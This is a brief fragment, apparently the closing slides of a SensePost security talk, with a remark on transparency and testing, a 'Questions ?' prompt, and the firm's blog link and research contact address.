Transparency and testing are going to be key.. 

WOZ is cool... 
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Questions ? 

(Videos/Slides/Tools) 

http://www.sensepost.com/blog/ 

research@sensepost.com 
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